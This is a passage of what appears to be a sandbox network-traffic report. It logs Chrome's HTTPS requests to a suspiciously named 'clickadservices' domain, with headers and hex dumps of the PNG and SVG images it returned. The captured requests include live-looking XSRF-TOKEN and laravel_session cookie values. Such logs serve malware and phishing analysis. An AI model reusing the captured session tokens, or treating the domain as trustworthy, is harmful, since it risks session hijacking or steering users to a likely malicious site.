                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:51 UTC640INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:51 GMT
                                                                                                                                      Content-Type: image/png
                                                                                                                                      Content-Length: 727
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="qrYOIGH4BKN8SNOJLeflWipzJBhyIs3HEHEROTD45140"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FennKGZGBe9rY%2BGoDNBDxLl28%2FkbnWyP5hmkhrd5tnAgUt47yjt1YdEZXlsj2TEDBzd%2BDzFrIn4WQdb5SrIHvWWFRf%2Fi9SaPv97m1ZsyGetg4%2FvXwYflB03zBJ1LLw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b9c5e790885-SEA
                                                                                                                                      2024-05-08 18:12:51 UTC727INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 02 9e 49 44 41 54 68 43 ed 97 81 51 1c 31 0c 45 8f 0e a0 83 a3 03 e8 60 a9 00 a8 20 a4 02 a0 82 90 0a a0 03 ae 83 90 0a b2 54 00 1d e4 3a 80 0e c8 7f 37 72 c6 ec dc ad e5 b5 73 77 3b 59 cf 68 18 f6 64 4b 5f 5f 92 e5 83 d9 c8 d7 c1 c8 fd 9f 4d 00 76 cd e0 c4 c0 c4 40 61 04 fe df 14 6a 9a e6 50 c1 3b 91 9c 4b 1a 09 ff b3 5e 25 ef 92 e7 b6 6d 17 85 01 4e 6e 1f c4 80 9c bf d1 c9 d7 92 79 d2 c2 6c f6 5d 40 ee 1c 7a 83 54 b2 00 58 d4 1f 65 e9 c2 ac b5 44 5a f2 24 59 1a 0b b0 12 98 e1 6f 60 e5 4c 40 60 a6 ea 72 03 30 e7 7f 99 73 38 42 64 1f fa bc 31 a6 ee 4d 87 3d c7 b5 41 e4 00 f8 61 91 27 c7 2f e5 08 11 4f 2e 81 80 05 40 34 12 6d 6b cf 92 9b 32 14 5c 00 a2
                                                                                                                                      Data Ascii: PNGIHDR00WIDAThCQ1E` T:7rsw;YhdK__Mv@ajP;K^%mNnyl]@zTXeDZ$Yo`L@`r0s8Bd1M=Aa'/O.@4mk2\


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      52192.168.2.1649774104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:51 UTC1542OUTGET /mnd5uDf70EKBz5cwqXlyQ3qijWRFcxrrFTVjS278142 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:52 UTC650INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:52 GMT
                                                                                                                                      Content-Type: image/svg+xml
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="mnd5uDf70EKBz5cwqXlyQ3qijWRFcxrrFTVjS278142"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wr%2Fm6wza7jlU%2FZf%2F8%2FUkol2Z7kYLh5H15eGWg3xQmiXp84Jgj4358zegjOsKCsTuWtCIQLl8p9Bm3ps5ksEwj8nzMs7ms2zDp5tIVUxRmUiA43nXOZOjEANm3%2BsrfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b9c9bb13070-SEA
                                                                                                                                      2024-05-08 18:12:52 UTC277INData Raw: 31 30 65 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 37 2c 36 2c 31 32 2c 31 31 2e 33 30 39 2c 31 31 2e 33 30 39 2c 31 32 2c 36 2c 36 2e 37 2e 36 39 31 2c 31 32 2c 30 2c 31 31 2e 33 30 39 2c 35 2e 33 2c 36 2c 30 2c 2e 36 39 31 2e 36 39 31 2c 30 2c 36 2c 35 2e 33 2c 31 31 2e 33 30 39 2c 30 2c 31 32 2c 2e 36 39 31 5a 22 20 66 69
                                                                                                                                      Data Ascii: 10e<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fi
                                                                                                                                      2024-05-08 18:12:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      53192.168.2.1649773104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:51 UTC1560OUTGET /klD379FF2GM6zPm33HgL5klVO4I4SQpHwx80Z7Yl1r1coRtBxGS3beU878163 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:51 UTC664INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:51 GMT
                                                                                                                                      Content-Type: image/svg+xml
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="klD379FF2GM6zPm33HgL5klVO4I4SQpHwx80Z7Yl1r1coRtBxGS3beU878163"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EmQSeJLvH4Y50UkInsVVIUPpMr%2Fj16ngY7jDzyEiSxjiTfuubV3fC2dh90eOgUHijcIjYaQfxFY0r9bUW8sumIdqM3r9%2BqGhB%2BhqWaQPwS4Tb9S2OHw66OiFBltUnA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b9c9ffb7639-SEA
                                                                                                                                      2024-05-08 18:12:51 UTC705INData Raw: 31 63 64 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 33 2e 39 37 36 32 20 30 43 31 36 2e 38 32 34 34 20 30 20 31 30 2e 39 37 30 37 20 35 2e 32 34 33 32 35 20 31
                                                                                                                                      Data Ascii: 1cde<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 1
                                                                                                                                      2024-05-08 18:12:51 UTC1369INData Raw: 20 32 33 2e 39 37 36 32 20 30 5a 4d 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 43 31 34 2e 33 30 38 37 20 33 33 2e 39 39 38 37 20 31 38 2e 38 33 36 38 20 33 30 2e 38 39 38 31 20 32 34 2e 30 38 39 31 20 33 30 2e 38 39 38 31 43 32 39 2e 32 33 39 35 20 33 30 2e 38 39 38 31 20 33 33 2e 36 39 33 36 20 33 33 2e 38 37 39 37 20 33 35 2e 38 31 39 34 20 33 38 2e 32 31 30 39 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e
                                                                                                                                      Data Ascii: 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.
                                                                                                                                      2024-05-08 18:12:51 UTC1369INData Raw: 31 30 39 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 31 39 2e 35 39 38 38 20 34 34 2e 39 30 30 37 43 31 36 2e 34 38 37 36 20 34 32 2e 39 36 37 32 20 31 34 2e 30 38 34 32 20 34 30 2e 37 37 33 38 20 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 5a 4d 33 31 2e 37 33 35 32 20 31 32 2e 31 36 34 34 43 32 36 2e 35 37 33 36 20 31 31 2e 36 39 39 35 20 32 31 2e 33 38 32 37 20 31 31 2e
                                                                                                                                      Data Ascii: 109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14.0842 40.7738 12.2354 38.4694ZM31.7352 12.1644C26.5736 11.6995 21.3827 11.
                                                                                                                                      2024-05-08 18:12:51 UTC1369INData Raw: 2e 34 38 32 34 4c 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 5a 4d 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 36 2e 30 38 34 20 34 31 2e 34 38 33 36 4c 32 36 2e 30 37 36 37 20 34 31 2e 34 38 38 31 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 5a 4d 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 4c 32 36 2e 30 37 34 36 20 34 31 2e 34 38 39 34 4c 32 36 2e 30 37 33 34 20 34 31 2e 34 39 30 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 5a 4d 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 37 2e 34 38 31 20 34 38 2e 32 39 34 31 4c 31 37 2e 34 38 32 36 20 34 38 2e 32 39 35 4c 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 5a 4d 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 32 31 2e 37 32 33 20 34 31 2e 35 31 31 33 4c 32 31 2e 37 31 32 39 20 34 31
                                                                                                                                      Data Ascii: .4824L28.1744 44.8939ZM28.1724 44.8952L26.084 41.4836L26.0767 41.4881L28.1724 44.8952ZM28.1703 44.8965L26.0746 41.4894L26.0734 41.4902L28.1703 44.8965ZM19.6031 44.9034L17.481 48.2941L17.4826 48.295L19.6031 44.9034ZM19.6009 44.902L21.723 41.5113L21.7129 41
                                                                                                                                      2024-05-08 18:12:51 UTC1369INData Raw: 43 34 34 2e 37 34 30 38 20 34 31 2e 36 34 33 20 34 37 2e 33 31 32 35 20 32 39 2e 31 34 30 37 20 34 37 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 33 39 2e 33 31 32 35 5a 4d 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 43 33 39 2e 33 31 32 35 20 32 31 2e 31 30 36 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 31 37 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 34 37 2e 33 31 32 35 43 34 37 2e 33 31 32 35 20 32 31 2e 30 39 38 32 20 34 37 2e 33 31 32 34 20 32 31 2e 30 36 37 36 20 34 37 2e 33 31 32 32 20 32 31 2e 30 33 37 4c 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 5a 4d 33 39 2e 33 31 32 35 20 32 30 2e 39 34 31 32 43 33 39 2e 33 31 32 35 20 32 30 2e 39 37 38 20 33 39 2e 33 31 32 34 20 32 31 2e 30 31 34 39 20 33 39 2e 33 31 32 33 20 32 31 2e 30 35 31 39 4c 34
                                                                                                                                      Data Ascii: C44.7408 41.643 47.3125 29.1407 47.3125 21.1287H39.3125ZM39.3124 21.096C39.3125 21.1068 39.3125 21.1178 39.3125 21.1287H47.3125C47.3125 21.0982 47.3124 21.0676 47.3122 21.037L39.3124 21.096ZM39.3125 20.9412C39.3125 20.978 39.3124 21.0149 39.3123 21.0519L4
                                                                                                                                      2024-05-08 18:12:51 UTC1217INData Raw: 38 36 38 20 34 38 2e 32 39 37 37 4c 31 37 2e 34 38 39 20 34 38 2e 32 39 39 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35 4c 32 31 2e 37 31 30 37 20 34 31 2e 35 30 33 37 4c 31 37 2e 34 38 36 38 20 34 38 2e 32 39 37 37 5a 4d 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 43 31 31 2e 32 35 34 31 20 34 33 2e 36 33 38 33 20 31 34 2e 30 30 31 31 20 34 36 2e 31 33 31 34 20 31 37 2e 34 38 37 34 20 34 38 2e 32 39 38 4c 32 31 2e 37 31 30 32 20 34 31 2e 35 30 33 33 43 31 38 2e 39 37 34 32 20 33 39 2e 38 30 33 20 31 36 2e 39 31 34 33 20 33 37 2e 39 30 39 33 20 31 35 2e 33 35 35 33 20 33 35 2e 39 36 36 33 4c 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 5a 4d 31 36 2e 35 37 32 38 20 31 36 2e 31 33 36 31 43 32 31 2e 34 39 38 34 20 31 35 2e 37 30 30 36 20 32 36 2e 34 35 31
                                                                                                                                      Data Ascii: 868 48.2977L17.489 48.299L21.7129 41.505L21.7107 41.5037L17.4868 48.2977ZM9.11539 40.9726C11.2541 43.6383 14.0011 46.1314 17.4874 48.298L21.7102 41.5033C18.9742 39.803 16.9143 37.9093 15.3553 35.9663L9.11539 40.9726ZM16.5728 16.1361C21.4984 15.7006 26.451
                                                                                                                                      2024-05-08 18:12:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      54192.168.2.1649775104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:51 UTC1156OUTGET /klMyUbEL6fKFla9Kr8ExT4Sp0CURklZAPvRG8XprsvgVF6eR20YVyojUy5uv216 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:51 UTC672INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:51 GMT
                                                                                                                                      Content-Type: image/svg+xml
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="klMyUbEL6fKFla9Kr8ExT4Sp0CURklZAPvRG8XprsvgVF6eR20YVyojUy5uv216"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QbTIQC2u3AEfxOqxc%2BTWBiC4vlLOCFcFN%2F1kDpJlltE%2F7rQKvUF%2FZKyDDhDMinCst36QpfqpnIW1Yi0FerQu5uwOXBnRF7yc7aF7UZco0s8%2B6J86J60On%2BUZWW9Vdw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b9cdb8d2816-SEA
                                                                                                                                      2024-05-08 18:12:51 UTC697INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                                                                                                      Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
